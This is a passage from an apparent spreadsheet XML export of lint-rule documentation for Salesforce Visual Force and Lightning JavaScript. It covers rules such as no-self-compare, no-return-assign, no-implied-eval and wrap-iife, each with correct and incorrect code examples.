&lt;p&gt;This rule disallows multiple spaces in regular expression literals.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-regex-spaces: "error"*/
var re = /foo   bar/;
var re = new RegExp("foo   bar");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-regex-spaces: "error"*/
var re = /foo {3}bar/;
var re = new RegExp("foo {3}bar");
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to allow multiple spaces in a regular expression, then you can safely turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Visual Force &amp; Lightning</t>
  </si>
  <si>
    <t>cs-vf:no-self-compare</t>
  </si>
  <si>
    <t>disallow comparisons where both sides are exactly the same</t>
  </si>
  <si>
    <t>&lt;p&gt;Comparing a variable against itself is usually an error, either a typo or refactoring error. It is confusing to the reader and may potentially introduce a runtime error.&lt;/p&gt;
&lt;p&gt;The only time you would compare a variable against itself is when you are testing for &lt;code&gt;NaN&lt;/code&gt;. However, it is far more appropriate to use &lt;code&gt;typeof x === 'number' &amp;amp;&amp;amp; isNaN(x)&lt;/code&gt; or the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/isNaN"&gt;Number.isNaN ES2015 function&lt;/a&gt; for that use case rather than leaving the reader of the code to determine the intent of self comparison.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This error is raised to highlight a potentially confusing and potentially pointless piece of code. There are almost no situations in which you would need to compare something to itself.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-self-compare: "error"*/
var x = 10;
if (x === x) {
    x = 20;
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-return-assign</t>
  </si>
  <si>
    <t>disallow assignment operators in `return` statements</t>
  </si>
  <si>
    <t>&lt;p&gt;One of the interesting, and sometimes confusing, aspects of JavaScript is that assignment can happen at almost any point. Because of this, an errant equals sign can end up causing assignment when the true intent was to do a comparison. This is especially true when using a &lt;code&gt;return&lt;/code&gt; statement. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;function doSomething() {
    return foo = bar + 2;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is difficult to tell the intent of the &lt;code&gt;return&lt;/code&gt; statement here. It's possible that the function is meant to return the result of &lt;code&gt;bar + 2&lt;/code&gt;, but then why is it assigning to &lt;code&gt;foo&lt;/code&gt;? It's also possible that the intent was to use a comparison operator such as &lt;code&gt;==&lt;/code&gt; and that this code is an error.&lt;/p&gt;
&lt;p&gt;Because of this ambiguity, it's considered a best practice to not use assignment in &lt;code&gt;return&lt;/code&gt; statements.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule aims to eliminate assignments from &lt;code&gt;return&lt;/code&gt; statements. As such, it will warn whenever an assignment is found as part of &lt;code&gt;return&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;The rule takes one option, a string, which must contain one of the following values:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;except-parens&lt;/code&gt; (default): Disallow assignments unless they are enclosed in parentheses.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;always&lt;/code&gt;: Disallow all assignments.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="exceptparens"&gt;except-parens&lt;/h3&gt;
&lt;p&gt;This is the default option.
It disallows assignments unless they are enclosed in parentheses.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the default &lt;code&gt;"except-parens"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: "error"*/
function doSomething() {
    return foo = bar + 2;
}
function doSomething() {
    return foo += 2;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;"except-parens"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: "error"*/
function doSomething() {
    return foo == bar + 2;
}
function doSomething() {
    return foo === bar + 2;
}
function doSomething() {
    return (foo = bar + 2);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="always"&gt;always&lt;/h3&gt;
&lt;p&gt;This option disallows all assignments in &lt;code&gt;return&lt;/code&gt; statements.
All assignments are treated as problems.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: ["error", "always"]*/
function doSomething() {
    return foo = bar + 2;
}
function doSomething() {
    return foo += 2;
}
function doSomething() {
    return (foo = bar + 2);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: ["error", "always"]*/
function doSomething() {
    return foo == bar + 2;
}
function doSomething() {
    return foo === bar + 2;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to allow the use of assignment operators in a &lt;code&gt;return&lt;/code&gt; statement, then you can safely disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-implied-eval</t>
  </si>
  <si>
    <t>disallow the use of `eval()`-like methods</t>
  </si>
  <si>
    <t>&lt;p&gt;It's considered a good practice to avoid using &lt;code&gt;eval()&lt;/code&gt; in JavaScript. There are security and performance implications involved with doing so, which is why many linters recommend disallowing &lt;code&gt;eval()&lt;/code&gt;. However, there are some other ways to pass a string and have it interpreted as JavaScript code that have similar concerns.&lt;/p&gt;
&lt;p&gt;The first is using &lt;code&gt;setTimeout()&lt;/code&gt;, &lt;code&gt;setInterval()&lt;/code&gt; or &lt;code&gt;execScript()&lt;/code&gt; (Internet Explorer only), both of which can accept a string of JavaScript code as their first argument. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;setTimeout("alert('Hi!');", 100);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is considered an implied &lt;code&gt;eval()&lt;/code&gt; because a string of JavaScript code is
 passed in to be interpreted. The same can be done with &lt;code&gt;setInterval()&lt;/code&gt; and &lt;code&gt;execScript()&lt;/code&gt;. Both interpret the JavaScript code in  the global scope. For  both &lt;code&gt;setTimeout()&lt;/code&gt; and &lt;code&gt;setInterval()&lt;/code&gt;, the first argument can also be a function, and that is considered safer and is more performant:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;setTimeout(function() {
    alert("Hi!");
}, 100);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The best practice is to always use a function for the first argument of &lt;code&gt;setTimeout()&lt;/code&gt; and &lt;code&gt;setInterval()&lt;/code&gt; (and avoid &lt;code&gt;execScript()&lt;/code&gt;).&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule aims to eliminate implied &lt;code&gt;eval()&lt;/code&gt; through the use of &lt;code&gt;setTimeout()&lt;/code&gt;, &lt;code&gt;setInterval()&lt;/code&gt; or &lt;code&gt;execScript()&lt;/code&gt;. As such, it will warn when either function is used with a string as the first argument.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-implied-eval: "error"*/
setTimeout("alert('Hi!');", 100);
setInterval("alert('Hi!');", 100);
execScript("alert('Hi!')");
window.setTimeout("count = 5", 10);
window.setInterval("foo = bar", 10);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-implied-eval: "error"*/
setTimeout(function() {
    alert("Hi!");
}, 100);
setInterval(function() {
    alert("Hi!");
}, 100);
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to allow &lt;code&gt;setTimeout()&lt;/code&gt; and &lt;code&gt;setInterval()&lt;/code&gt; with string arguments, then you can safely disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:wrap-iife</t>
  </si>
  <si>
    <t>require parentheses around immediate `function` invocations</t>
  </si>
  <si>
    <t>&lt;p&gt;You can immediately invoke function expressions, but not function declarations. A common technique to create an immediately-invoked function expression (IIFE) is to wrap a function declaration in parentheses. The opening parentheses causes the contained function to be parsed as an expression, rather than a declaration.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;// function expression could be unwrapped
var x = function () { return { y: 1 };}();
// function declaration must be wrapped
function () { /* side effects */ }(); // SyntaxError
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule requires all immediately-invoked function expressions to be wrapped in parentheses.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has two options, a string option and an object option.&lt;/p&gt;
&lt;p&gt;String option:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"outside"&lt;/code&gt; enforces always wrapping the &lt;em&gt;call&lt;/em&gt; expression. The default is &lt;code&gt;"outside"&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"inside"&lt;/code&gt; enforces always wrapping the &lt;em&gt;function&lt;/em&gt; expression.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"any"&lt;/code&gt; enforces always wrapping, but allows either style.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Object option:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"functionPrototypeMethods": true&lt;/code&gt; additionally enforces wrapping function expressions invoked using &lt;code&gt;.call&lt;/code&gt; and &lt;code&gt;.apply&lt;/code&gt;. The default is &lt;code&gt;false&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="outside"&gt;outside&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the default &lt;code&gt;"outside"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "outside"]*/
var x = function () { return { y: 1 };}(); // unwrapped
var x = (function () { return { y: 1 };})(); // wrapped function expression
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;"outside"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "outside"]*/
var x = (function () { return { y: 1 };}()); // wrapped call expression
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="inside"&gt;inside&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"inside"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "inside"]*/
var x = function () { return { y: 1 };}(); // unwrapped
var x = (function () { return { y: 1 };}()); // wrapped call expression
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"inside"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "inside"]*/
var x = (function () { return { y: 1 };})(); // wrapped function expression
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="any"&gt;any&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"any"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "any"]*/
var x = function () { return { y: 1 };}(); // unwrapped
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"any"&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "any"]*/
var x = (function () { return { y: 1 };}()); // wrapped call expression
var x = (function () { return { y: 1 };})(); // wrapped function expression
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="functionprototypemethods"&gt;functionPrototypeMethods&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the &lt;code&gt;"inside", { "functionPrototypeMethods": true }&lt;/code&gt; options:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/* eslint wrap-iife: [2, "inside", { functionPrototypeMethods: true }] */
var x = function(){ foo(); }()
var x = (function(){ foo(); }())
var x = function(){ foo(); }.call(bar)
var x = (function(){ foo(); }.call(bar))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;"inside", { "functionPrototypeMethods": true }&lt;/code&gt; options:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/* eslint wrap-iife: [2, "inside", { functionPrototypeMethods: true }] */
var x = (function(){ foo(); })()
var x = (function(){ foo(); }).call(bar)
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:ecma-intrinsics</t>
  </si>
  <si>
    <t>validate javascript APIs</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that intrinsic Javascript APIs are used according to the documentation. It disallows deprecated, non-standard and removed features.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;Intrinsic APIs are those found in the &lt;a href="https://tc39.github.io/ecma262/"&gt;ECMAScript Language Specification&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Standard Lightning Component Framework features.&lt;/li&gt;
&lt;li&gt;Standard Javascript features.&lt;/li&gt;
&lt;li&gt;Standard Locker Service SecureObject object features. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;String.doSomething = function(){}  //This is a violation, the intrinsic type String is modified.
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-floating-decimal</t>
  </si>
  <si>
    <t>disallow leading or trailing decimal points in numeric literals</t>
  </si>
  <si>
    <t>&lt;p&gt;Float values in JavaScript contain a decimal point, and there is no requirement that the decimal point be preceded or followed by a number. For example, the following are all valid JavaScript numbers:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var num = .5;
var num = 2.;
var num = -.7;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Although not a syntax error, this format for numbers can make it difficult to distinguish between true decimal numbers and the dot operator. For this reason, some recommend that you should always include a number before and after a decimal point to make it clear the intent is to create a decimal number.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at eliminating floating decimal points and will warn whenever a numeric value has a decimal point but is missing a number either before or after it.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-floating-decimal: "error"*/
var num = .5;
var num = 2.;
var num = -.7;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-floating-decimal: "error"*/
var num = 0.5;
var num = 2.0;
var num = -0.7;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you aren't concerned about misinterpreting floating decimal point values, then you can safely turn this rule off.&lt;/p&gt;
&lt;h2 id="compatibility"&gt;Compatibility&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;JSHint&lt;/strong&gt;: W008&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-div-regex</t>
  </si>
  <si>
    <t>disallow division operators explicitly at the beginning of regular expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Require regex literals to escape division operators.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;function bar() { return /=foo/; }
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This is used to disambiguate the division operator to not confuse users. Without an escape character users may think that the regular expression is a division expression.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-div-regex: "error"*/
function bar() { return /=foo/; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-div-regex: "error"*/
function bar() { return /\=foo/; }
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-underscore-dangle</t>
  </si>
  <si>
    <t>disallow dangling underscores in identifiers</t>
  </si>
  <si>
    <t>&lt;p&gt;As far as naming conventions for identifiers go, dangling underscores may be the most polarizing in JavaScript. Dangling underscores are underscores at either the beginning or end of an identifier, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var _foo;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is actually a long history of using dangling underscores to indicate "private" members of objects in JavaScript (though JavaScript doesn't have truly private members, this convention served as a warning). This began with SpiderMonkey adding nonstandard methods such as &lt;code&gt;__defineGetter__()&lt;/code&gt;. The intent with the underscores was to make it obvious that this method was special in some way. Since that time, using a single underscore prefix has become popular as a way to indicate "private" members of objects.&lt;/p&gt;
&lt;p&gt;Whether or not you choose to allow dangling underscores in identifiers is purely a convention and has no effect on performance, readability, or complexity. It's purely a preference.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows dangling underscores in identifiers.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: "error"*/
var foo_;
var __proto__ = {};
foo._bar();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: "error"*/
var _ = require('underscore');
var obj = _.contains(items, item);
obj.__proto__ = {};
var file = __filename;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;"allow"&lt;/code&gt; allows specified identifiers to have dangling underscores&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"allowAfterThis": false&lt;/code&gt; (default) disallows dangling underscores in members of the &lt;code&gt;this&lt;/code&gt; object&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"allowAfterSuper": false&lt;/code&gt; (default) disallows dangling underscores in members of the &lt;code&gt;super&lt;/code&gt; object&lt;/li&gt;
&lt;li&gt;&lt;code&gt;"enforceInMethodNames": false&lt;/code&gt; (default) allows dangling underscores in method names&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="allow"&gt;allow&lt;/h3&gt;
&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allow": ["foo_", "_bar"] }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "allow": ["foo_", "_bar"] }]*/
var foo_;
foo._bar();
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowafterthis"&gt;allowAfterThis&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowAfterThis": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "allowAfterThis": true }]*/
var a = this.foo_;
this._bar();
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowaftersuper"&gt;allowAfterSuper&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;{ "allowAfterSuper": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "allowAfterSuper": true }]*/
var a = super.foo_;
super._bar();
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="enforceinmethodnames"&gt;enforceInMethodNames&lt;/h3&gt;
&lt;p&gt;Examples of incorrect code for this rule with the &lt;code&gt;{ "enforceInMethodNames": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-underscore-dangle: ["error", { "enforceInMethodNames": true }]*/
class Foo {
  _bar() {}
}
class Foo {
  bar_() {}
}
const o = {
  _bar() {}
};
const o = {
  bar_() = {}
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to allow dangling underscores in identifiers, then you can safely turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:new-parens</t>
  </si>
  <si>
    <t>require parentheses when invoking a constructor with no arguments</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript allows the omission of parentheses when invoking a function via the &lt;code&gt;new&lt;/code&gt; keyword and the constructor has no arguments. However, some coders believe that omitting the parentheses is inconsistent with the rest of the language and thus makes code less clear.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var person = new Person;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule requires parentheses when invoking a constructor with no arguments using the &lt;code&gt;new&lt;/code&gt; keyword in order to increase code clarity.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint new-parens: "error"*/
var person = new Person;
var person = new (Person);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint new-parens: "error"*/
var person = new Person();
var person = new (Person)();
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:aura-api</t>
  </si>
  <si>
    <t>validate Aura API</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that the Aura API is used according to the documentation. It disallows private and undocumented features.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Standard Lightning Component Framework features.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard Javascript features.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Standard Locker Service SecureObject object features. &lt;/p&gt;
&lt;p&gt;For details of all of the permitted methods in the framework, including $A, see the JavaScript API at https://myDomain.lightning.force.com/auradocs/reference.app, where myDomain is the name of your custom Salesforce domain.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;Aura.notGreat(); // Use $A instead of Aura
$A.util.notUtil(); // $A.util does not contain notUtil
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;$A.createComponent("aura:text",{value:'Hello World'}, function(auraTextComponent, status, statusMessagesList){
     // auraTextComponent is an instance of aura:text containing the value Hello World
});
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-octal-escape</t>
  </si>
  <si>
    <t>disallow octal escape sequences in string literals</t>
  </si>
  <si>
    <t>&lt;p&gt;As of the ECMAScript 5 specification, octal escape sequences in string literals are deprecated and should not be used. Unicode escape sequences should be used instead.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var foo = "Copyright \251";
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows octal escape sequences in string literals.&lt;/p&gt;
&lt;p&gt;If ESLint parses code in strict mode, the parser (instead of this rule) reports the error.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-octal-escape: "error"*/
var foo = "Copyright \251";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-octal-escape: "error"*/
var foo = "Copyright \u00A9";   // unicode
var foo = "Copyright \xA9";     // hexadecimal
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-sparse-arrays</t>
  </si>
  <si>
    <t>disallow sparse arrays</t>
  </si>
  <si>
    <t>&lt;p&gt;Sparse arrays contain empty slots, most frequently due to multiple commas being used in an array literal, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var items = [,,];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While the &lt;code&gt;items&lt;/code&gt; array in this example has a &lt;code&gt;length&lt;/code&gt; of 2, there are actually no values in &lt;code&gt;items[0]&lt;/code&gt; or &lt;code&gt;items[1]&lt;/code&gt;. The fact that the array literal is valid with only commas inside, coupled with the &lt;code&gt;length&lt;/code&gt; being set and actual item values not being set, make sparse arrays confusing for many developers. Consider the following:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var colors = [ "red",, "blue" ];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example, the &lt;code&gt;colors&lt;/code&gt; array has a &lt;code&gt;length&lt;/code&gt; of 3. But did the developer intend for there to be an empty spot in the middle of the array? Or is it a typo?&lt;/p&gt;
&lt;p&gt;The confusion around sparse arrays defined in this manner is enough that it's recommended to avoid using them unless you are certain that they are useful in your code.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows sparse array literals which have "holes" where commas are not preceded by elements. It does not apply to a trailing comma following the last element.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-sparse-arrays: "error"*/
var items = [,];
var colors = [ "red",, "blue" ];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-sparse-arrays: "error"*/
var items = [];
var items = new Array(23);
// trailing comma (after the last element) is not a problem
var colors = [ "red", "blue", ];
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to use sparse arrays, then it is safe to disable this rule.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.nczonline.net/blog/2007/09/09/inconsistent-array-literals/"&gt;Inconsistent array literals&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>vf:exception</t>
  </si>
  <si>
    <t>cs-vf:no-plusplus</t>
  </si>
  <si>
